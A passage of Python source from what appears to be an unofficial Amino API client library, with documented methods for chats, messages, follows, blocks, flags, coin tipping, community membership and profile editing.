- **Success** : :meth:`Chat Object <amino.lib.util.objects.Thread>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.get(f"{self.api}/g/s/chat/thread/{chatId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.Thread(json.loads(response.text)["thread"]).Thread
def get_chat_users(self, chatId: str, start: int = 0, size: int = 25):
response = self.session.get(f"{self.api}/g/s/chat/thread/{chatId}/member?start={start}&size={size}&type=default&cv=1.2", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.UserProfileList(json.loads(response.text)["memberList"]).UserProfileList
def join_chat(self, chatId: str):
"""
Join a Chat.
**Parameters**
- **chatId** : ID of the Chat.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/member/{self.userId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def leave_chat(self, chatId: str):
"""
Leave a Chat.
**Parameters**
- **chatId** : ID of the Chat.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.delete(f"{self.api}/g/s/chat/thread/{chatId}/member/{self.userId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def start_chat(self, userId: Union[str, list], message: str, title: str = None, content: str = None, isGlobal: bool = False, publishToGlobal: bool = False):
"""
Start a Chat with a User or a List of Users.
**Parameters**
- **userId** : ID of the User or List of User IDs.
- **message** : Starting Message.
- **title** : Title of Group Chat.
- **content** : Content of Group Chat.
- **isGlobal** : If Group Chat is Global.
- **publishToGlobal** : If Group Chat should show in Global.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if isinstance(userId, str): userIds = [userId]
elif isinstance(userId, list): userIds = userId
else: raise exceptions.WrongType()
data = {
"title": title,
"inviteeUids": userIds,
"initialMessageContent": message,
"content": content,
"timestamp": int(timestamp() * 1000)
}
if isGlobal is True: data["type"] = 2; data["eventSource"] = "GlobalComposeMenu"
else: data["type"] = 0
if publishToGlobal is True: data["publishToGlobal"] = 1
else: data["publishToGlobal"] = 0
data = json.dumps(data)
response = self.session.post(f"{self.api}/g/s/chat/thread", data=data, headers=self.parse_headers(data=data), proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else objects.Thread(json.loads(response.text)["thread"]).Thread
def invite_to_chat(self, userId: Union[str, list], chatId: str):
"""
Invite a User or List of Users to a Chat.
**Parameters**
- **userId** : ID of the User or List of User IDs.
- **chatId** : ID of the Chat.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if isinstance(userId, str): userIds = [userId]
elif isinstance(userId, list): userIds = userId
else: raise exceptions.WrongType
data = json.dumps({
"uids": userIds,
"timestamp": int(timestamp() * 1000)
})
response = self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/member/invite", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def kick(self, userId: str, chatId: str, allowRejoin: bool = True):
if allowRejoin: allowRejoin = 1
if not allowRejoin: allowRejoin = 0
response = self.session.delete(f"{self.api}/g/s/chat/thread/{chatId}/member/{userId}?allowRejoin={allowRejoin}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def get_chat_messages(self, chatId: str, size: int = 25, pageToken: str = None):
"""
List of Messages from a Chat.
**Parameters**
- **chatId** : ID of the Chat.
- *size* : Size of the list.
- *pageToken* : Next Page Token.
**Returns**
- **Success** : :meth:`Message List <amino.lib.util.objects.MessageList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if pageToken is not None: url = f"{self.api}/g/s/chat/thread/{chatId}/message?v=2&pagingType=t&pageToken={pageToken}&size={size}"
else: url = f"{self.api}/g/s/chat/thread/{chatId}/message?v=2&pagingType=t&size={size}"
response = self.session.get(url, headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.GetMessages(json.loads(response.text)).GetMessages
def get_message_info(self, chatId: str, messageId: str):
"""
Information about a Message from a Chat.
**Parameters**
- **chatId** : ID of the Chat.
- **messageId** : ID of the Message.
**Returns**
- **Success** : :meth:`Message Object <amino.lib.util.objects.Message>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.get(f"{self.api}/g/s/chat/thread/{chatId}/message/{messageId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.Message(json.loads(response.text)["message"]).Message
def get_community_info(self, comId: str):
"""
Information about a Community.
**Parameters**
- **comId** : ID of the Community.
**Returns**
- **Success** : :meth:`Community Object <amino.lib.util.objects.Community>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.get(f"{self.api}/g/s-x{comId}/community/info?withInfluencerList=1&withTopicList=true&influencerListOrderStrategy=fansCount", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.Community(json.loads(response.text)["community"]).Community
def search_community(self, aminoId: str):
"""
Search a Community by its Amino ID.
**Parameters**
- **aminoId** : Amino ID of the Community.
**Returns**
- **Success** : :meth:`Community List <amino.lib.util.objects.CommunityList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.get(f"{self.api}/g/s/search/amino-id-and-link?q={aminoId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else:
response = json.loads(response.text)["resultList"]
if len(response) == 0: raise exceptions.CommunityNotFound(aminoId)
else: return objects.CommunityList([com["refObject"] for com in response]).CommunityList
def get_user_following(self, userId: str, start: int = 0, size: int = 25):
"""
List of Users that the User is Following.
**Parameters**
- **userId** : ID of the User.
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`User List <amino.lib.util.objects.UserProfileList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.get(f"{self.api}/g/s/user-profile/{userId}/joined?start={start}&size={size}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.UserProfileList(json.loads(response.text)["userProfileList"]).UserProfileList
def get_user_followers(self, userId: str, start: int = 0, size: int = 25):
"""
List of Users that are Following the User.
**Parameters**
- **userId** : ID of the User.
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`User List <amino.lib.util.objects.UserProfileList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.get(f"{self.api}/g/s/user-profile/{userId}/member?start={start}&size={size}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.UserProfileList(json.loads(response.text)["userProfileList"]).UserProfileList
def get_user_visitors(self, userId: str, start: int = 0, size: int = 25):
"""
List of Users that Visited the User.
**Parameters**
- **userId** : ID of the User.
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`Visitors List <amino.lib.util.objects.VisitorsList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.get(f"{self.api}/g/s/user-profile/{userId}/visitors?start={start}&size={size}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.VisitorsList(json.loads(response.text)).VisitorsList
def get_blocked_users(self, start: int = 0, size: int = 25):
"""
List of Users that the User Blocked.
**Parameters**
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`Users List <amino.lib.util.objects.UserProfileList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.get(f"{self.api}/g/s/block?start={start}&size={size}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.UserProfileList(json.loads(response.text)["userProfileList"]).UserProfileList
def get_blog_info(self, blogId: str = None, wikiId: str = None, quizId: str = None, fileId: str = None):
if blogId or quizId:
if quizId is not None: blogId = quizId
response = self.session.get(f"{self.api}/g/s/blog/{blogId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.GetBlogInfo(json.loads(response.text)).GetBlogInfo
elif wikiId:
response = self.session.get(f"{self.api}/g/s/item/{wikiId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.GetWikiInfo(json.loads(response.text)).GetWikiInfo
elif fileId:
response = self.session.get(f"{self.api}/g/s/shared-folder/files/{fileId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.SharedFolderFile(json.loads(response.text)["file"]).SharedFolderFile
else: raise exceptions.SpecifyType()
def get_blog_comments(self, blogId: str = None, wikiId: str = None, quizId: str = None, fileId: str = None, sorting: str = "newest", start: int = 0, size: int = 25):
if sorting == "newest": sorting = "newest"
elif sorting == "oldest": sorting = "oldest"
elif sorting == "top": sorting = "vote"
else: raise exceptions.WrongType(sorting)
if blogId or quizId:
if quizId is not None: blogId = quizId
response = self.session.get(f"{self.api}/g/s/blog/{blogId}/comment?sort={sorting}&start={start}&size={size}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
elif wikiId: response = self.session.get(f"{self.api}/g/s/item/{wikiId}/comment?sort={sorting}&start={start}&size={size}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
elif fileId: response = self.session.get(f"{self.api}/g/s/shared-folder/files/{fileId}/comment?sort={sorting}&start={start}&size={size}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
else: raise exceptions.SpecifyType()
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.CommentList(json.loads(response.text)["commentList"]).CommentList
def get_blocker_users(self, start: int = 0, size: int = 25):
"""
List of Users that are Blocking the User.
**Parameters**
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`List of User IDs <None>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.get(f"{self.api}/g/s/block/full-list?start={start}&size={size}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return json.loads(response.text)["blockerUidList"]
def get_wall_comments(self, userId: str, sorting: str, start: int = 0, size: int = 25):
"""
List of Wall Comments of a User.
**Parameters**
- **userId** : ID of the User.
- **sorting** : Order of the Comments.
- ``newest``, ``oldest``, ``top``
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`Comments List <amino.lib.util.objects.CommentList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if sorting.lower() == "newest": sorting = "newest"
elif sorting.lower() == "oldest": sorting = "oldest"
elif sorting.lower() == "top": sorting = "vote"
else: raise exceptions.WrongType(sorting)
response = self.session.get(f"{self.api}/g/s/user-profile/{userId}/g-comment?sort={sorting}&start={start}&size={size}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.CommentList(json.loads(response.text)["commentList"]).CommentList
def flag(self, reason: str, flagType: int, userId: str = None, blogId: str = None, wikiId: str = None, asGuest: bool = False):
"""
Flag a User, Blog or Wiki.
**Parameters**
- **reason** : Reason of the Flag.
- **flagType** : Type of the Flag.
- **userId** : ID of the User.
- **blogId** : ID of the Blog.
- **wikiId** : ID of the Wiki.
- *asGuest* : Execute as a Guest.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if reason is None: raise exceptions.ReasonNeeded()
if flagType is None: raise exceptions.FlagTypeNeeded()
data = {
"flagType": flagType,
"message": reason,
"timestamp": int(timestamp() * 1000)
}
if userId:
data["objectId"] = userId
data["objectType"] = 0
elif blogId:
data["objectId"] = blogId
data["objectType"] = 1
elif wikiId:
data["objectId"] = wikiId
data["objectType"] = 2
else: raise exceptions.SpecifyType
if asGuest: flg = "g-flag"
else: flg = "flag"
data = json.dumps(data)
response = self.session.post(f"{self.api}/g/s/{flg}", data=data, headers=self.parse_headers(data=data), proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def send_message(self, chatId: str, message: str = None, messageType: int = 0, file: BinaryIO = None, fileType: str = None, replyTo: str = None, mentionUserIds: list = None, stickerId: str = None, embedId: str = None, embedType: int = None, embedLink: str = None, embedTitle: str = None, embedContent: str = None, embedImage: BinaryIO = None):
"""
Send a Message to a Chat.
**Parameters**
- **message** : Message to be sent
- **chatId** : ID of the Chat.
- **file** : File to be sent.
- **fileType** : Type of the file.
- ``audio``, ``image``, ``gif``
- **messageType** : Type of the Message.
- **mentionUserIds** : List of User IDS to mention. '@' needed in the Message.
- **replyTo** : Message ID to reply to.
- **stickerId** : Sticker ID to be sent.
- **embedTitle** : Title of the Embed.
- **embedContent** : Content of the Embed.
- **embedLink** : Link of the Embed.
- **embedImage** : Image of the Embed.
- **embedId** : ID of the Embed.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if message is not None and file is None:
message = message.replace("<$", "").replace("$>", "")
mentions = []
if mentionUserIds:
for mention_uid in mentionUserIds:
mentions.append({"uid": mention_uid})
if embedImage:
embedImage = [[100, self.upload_media(embedImage, "image"), None]]
data = {
"type": messageType,
"content": message,
"clientRefId": int(timestamp() / 10 % 1000000000),
"attachedObject": {
"objectId": embedId,
"objectType": embedType,
"link": embedLink,
"title": embedTitle,
"content": embedContent,
"mediaList": embedImage
},
"extensions": {"mentionedArray": mentions},
"timestamp": int(timestamp() * 1000)
}
if replyTo: data["replyMessageId"] = replyTo
if stickerId:
data["content"] = None
data["stickerId"] = stickerId
data["type"] = 3
if file:
data["content"] = None
if fileType == "audio":
data["type"] = 2
data["mediaType"] = 110
elif fileType == "image":
data["mediaType"] = 100
data["mediaUploadValueContentType"] = "image/jpg"
data["mediaUhqEnabled"] = True
elif fileType == "gif":
data["mediaType"] = 100
data["mediaUploadValueContentType"] = "image/gif"
data["mediaUhqEnabled"] = True
else: raise exceptions.SpecifyType
data["mediaUploadValue"] = base64.b64encode(file.read()).decode()
data = json.dumps(data)
response = self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/message", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
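    # Illustrative usage sketch (not part of the original client; the chat ID and the
    # file path are placeholders):
    #
    #   client.send_message(chatId="0000-chat-id", message="hello")
    #   with open("picture.jpg", "rb") as fp:
    #       client.send_message(chatId="0000-chat-id", file=fp, fileType="image")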
def delete_message(self, chatId: str, messageId: str, asStaff: bool = False, reason: str = None):
"""
Delete a Message from a Chat.
**Parameters**
- **messageId** : ID of the Message.
- **chatId** : ID of the Chat.
- **asStaff** : If execute as a Staff member (Leader or Curator).
- **reason** : Reason of the action to show on the Moderation History.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = {
"adminOpName": 102,
"adminOpNote": {"content": reason},
"timestamp": int(timestamp() * 1000)
}
data = json.dumps(data)
if not asStaff: response = self.session.delete(f"{self.api}/g/s/chat/thread/{chatId}/message/{messageId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
else: response = self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/message/{messageId}/admin", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def mark_as_read(self, chatId: str, messageId: str):
"""
Mark a Message from a Chat as Read.
**Parameters**
- **messageId** : ID of the Message.
- **chatId** : ID of the Chat.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"messageId": messageId,
"timestamp": int(timestamp() * 1000)
})
response = self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/mark-as-read", headers=self.parse_headers(), data=data, proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def edit_chat(self, chatId: str, doNotDisturb: bool = None, pinChat: bool = None, title: str = None, icon: str = None, backgroundImage: str = None, content: str = None, announcement: str = None, coHosts: list = None, keywords: list = None, pinAnnouncement: bool = None, publishToGlobal: bool = None, canTip: bool = None, viewOnly: bool = None, canInvite: bool = None, fansOnly: bool = None):
"""
Edit the settings of a Chat.
**Parameters**
- **chatId** : ID of the Chat.
- **title** : Title of the Chat.
- **content** : Content of the Chat.
- **icon** : Icon of the Chat.
- **backgroundImage** : Url of the Background Image of the Chat.
- **announcement** : Announcement of the Chat.
- **pinAnnouncement** : If the Chat Announcement should be Pinned or not.
- **coHosts** : List of User IDS to be Co-Host.
- **keywords** : List of Keywords of the Chat.
- **viewOnly** : If the Chat should be on View Only or not.
- **canTip** : If the Chat should be Tippable or not.
- **canInvite** : If the Chat should be Invitable or not.
- **fansOnly** : If the Chat should be Fans Only or not.
- **publishToGlobal** : If the Chat should show on Public Chats or not.
- **doNotDisturb** : If Do Not Disturb should be enabled for the Chat or not.
- **pinChat** : If the Chat should be Pinned or not.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = {"timestamp": int(timestamp() * 1000)}
if title: data["title"] = title
if content: data["content"] = content
if icon: data["icon"] = icon
if keywords: data["keywords"] = keywords
if announcement: data["extensions"]["announcement"] = announcement
if pinAnnouncement: data["extensions"]["pinAnnouncement"] = pinAnnouncement
if fansOnly: data["extensions"] = {"fansOnly": fansOnly}
if publishToGlobal: data["publishToGlobal"] = 0
if not publishToGlobal: data["publishToGlobal"] = 1
res = []
if doNotDisturb is not None:
if doNotDisturb:
data = json.dumps({"alertOption": 2, "timestamp": int(timestamp() * 1000)})
response = self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/member/{self.userId}/alert", data=data, headers=self.parse_headers(data=data), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
else: res.append(response.status_code)
if not doNotDisturb:
data = json.dumps({"alertOption": 1, "timestamp": int(timestamp() * 1000)})
response = self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/member/{self.userId}/alert", data=data, headers=self.parse_headers(data=data), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
else: res.append(response.status_code)
if pinChat is not None:
if pinChat:
response = self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/pin", data=data, headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
else: res.append(response.status_code)
if not pinChat:
response = self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/unpin", data=data, headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
else: res.append(response.status_code)
if backgroundImage is not None:
data = json.dumps({"media": [100, backgroundImage, None], "timestamp": int(timestamp() * 1000)})
response = self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/member/{self.userId}/background", data=data, headers=self.parse_headers(data=data), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
else: res.append(response.status_code)
if coHosts is not None:
data = json.dumps({"uidList": coHosts, "timestamp": int(timestamp() * 1000)})
response = self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/co-host", data=data, headers=self.parse_headers(data=data), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
else: res.append(response.status_code)
if viewOnly is not None:
#fixed by Minori#6457
if viewOnly:
response = self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/view-only/enable", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
else: res.append(response.status_code)
if not viewOnly:
response = self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/view-only/disable", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
else: res.append(response.status_code)
if canInvite is not None:
if canInvite:
response = self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/members-can-invite/enable", data=data, headers=self.parse_headers(data=data), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
else: res.append(response.status_code)
if not canInvite:
response = self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/members-can-invite/disable", data=data, headers=self.parse_headers(data=data), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
else: res.append(response.status_code)
if canTip is not None:
if canTip:
response = self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/tipping-perm-status/enable", data=data, headers=self.parse_headers(data=data), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
else: res.append(response.status_code)
if not canTip:
response = self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/tipping-perm-status/disable", data=data, headers=self.parse_headers(data=data), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
else: res.append(response.status_code)
data = json.dumps(data)
response = self.session.post(f"{self.api}/g/s/chat/thread/{chatId}", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
else: res.append(response.status_code)
return res
def visit(self, userId: str):
"""
Visit a User.
**Parameters**
- **userId** : ID of the User.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.get(f"{self.api}/g/s/user-profile/{userId}?action=visit", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def send_coins(self, coins: int, blogId: str = None, chatId: str = None, objectId: str = None, transactionId: str = None):
url = None
if transactionId is None: transactionId = str(UUID(hexlify(urandom(16)).decode('ascii')))
data = {
"coins": coins,
"tippingContext": {"transactionId": transactionId},
"timestamp": int(timestamp() * 1000)
}
if blogId is not None: url = f"{self.api}/g/s/blog/{blogId}/tipping"
if chatId is not None: url = f"{self.api}/g/s/chat/thread/{chatId}/tipping"
if objectId is not None:
data["objectId"] = objectId
data["objectType"] = 2
url = f"{self.api}/g/s/tipping"
if url is None: raise exceptions.SpecifyType()
data = json.dumps(data)
response = self.session.post(url, headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
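# Illustrative usage sketch (not part of the library): `client` stands for an
# already authenticated instance of this client class, and the IDs below are
# placeholders. One of blogId / chatId / objectId selects the tipping endpoint.
#
#     client.send_coins(coins=10, chatId="chat-id")    # tip a chat thread
#     client.send_coins(coins=5, blogId="blog-id")     # tip a blog post
#     client.send_coins(coins=2, objectId="wiki-id")   # generic tipping endpoint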
def follow(self, userId: Union[str, list]):
"""
Follow a User or multiple Users.
**Parameters**
- **userId** : ID of the User or List of IDs of the Users.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if isinstance(userId, str):
response = self.session.post(f"{self.api}/g/s/user-profile/{userId}/member", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
elif isinstance(userId, list):
data = json.dumps({"targetUidList": userId, "timestamp": int(timestamp() * 1000)})
response = self.session.post(f"{self.api}/g/s/user-profile/{self.userId}/joined", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
else: raise exceptions.WrongType
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def unfollow(self, userId: str):
"""
Unfollow a User.
**Parameters**
- **userId** : ID of the User.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.delete(f"{self.api}/g/s/user-profile/{userId}/member/{self.userId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def block(self, userId: str):
"""
Block a User.
**Parameters**
- **userId** : ID of the User.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.post(f"{self.api}/g/s/block/{userId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def unblock(self, userId: str):
"""
Unblock a User.
**Parameters**
- **userId** : ID of the User.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.delete(f"{self.api}/g/s/block/{userId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def join_community(self, comId: str, invitationId: str = None):
"""
Join a Community.
**Parameters**
- **comId** : ID of the Community.
- **invitationId** : ID of the Invitation Code.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = {"timestamp": int(timestamp() * 1000)}
if invitationId: data["invitationId"] = invitationId
data = json.dumps(data)
response = self.session.post(f"{self.api}/x{comId}/s/community/join", data=data, headers=self.parse_headers(data=data), proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
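# Usage sketch (illustrative, not part of the library): `client` is an
# authenticated instance of this class; the community ID and invitation code
# are placeholders.
#
#     client.join_community(comId="123456")                          # open community
#     client.join_community(comId="123456", invitationId="abcdef")   # invite-only community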
def request_join_community(self, comId: str, message: str = None):
"""
Request to join a Community.
**Parameters**
- **comId** : ID of the Community.
- **message** : Message to be sent.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({"message": message, "timestamp": int(timestamp() * 1000)})
response = self.session.post(f"{self.api}/x{comId}/s/community/membership-request", data=data, headers=self.parse_headers(data=data), proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def leave_community(self, comId: str):
"""
Leave a Community.
**Parameters**
- **comId** : ID of the Community.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.post(f"{self.api}/x{comId}/s/community/leave", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def flag_community(self, comId: str, reason: str, flagType: int, isGuest: bool = False):
"""
Flag a Community.
**Parameters**
- **comId** : ID of the Community.
- **reason** : Reason of the Flag.
- **flagType** : Type of Flag.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if reason is None: raise exceptions.ReasonNeeded
if flagType is None: raise exceptions.FlagTypeNeeded
data = json.dumps({
"objectId": comId,
"objectType": 16,
"flagType": flagType,
"message": reason,
"timestamp": int(timestamp() * 1000)
})
if isGuest: flg = "g-flag"
else: flg = "flag"
response = self.session.post(f"{self.api}/x{comId}/s/{flg}", data=data, headers=self.parse_headers(data=data), proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def edit_profile(self, nickname: str = None, content: str = None, icon: BinaryIO = None, backgroundColor: str = None, backgroundImage: str = None, defaultBubbleId: str = None):
"""
Edit account's Profile.
**Parameters**
- **nickname** : Nickname of the Profile.
- **content** : Biography of the Profile.
- **icon** : Icon of the Profile.
- **backgroundImage** : Url of the Background Picture of the Profile.
- **backgroundColor** : Hexadecimal Background Color of the Profile.
- **defaultBubbleId** : Chat bubble ID.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = {
"address": None,
"latitude": 0,
"longitude": 0,
"mediaList": None,
"eventSource": "UserProfileView",
"timestamp": int(timestamp() * 1000)
}
if nickname: data["nickname"] = nickname
if icon: data["icon"] = self.upload_media(icon, "image")
if content: data["content"] = content
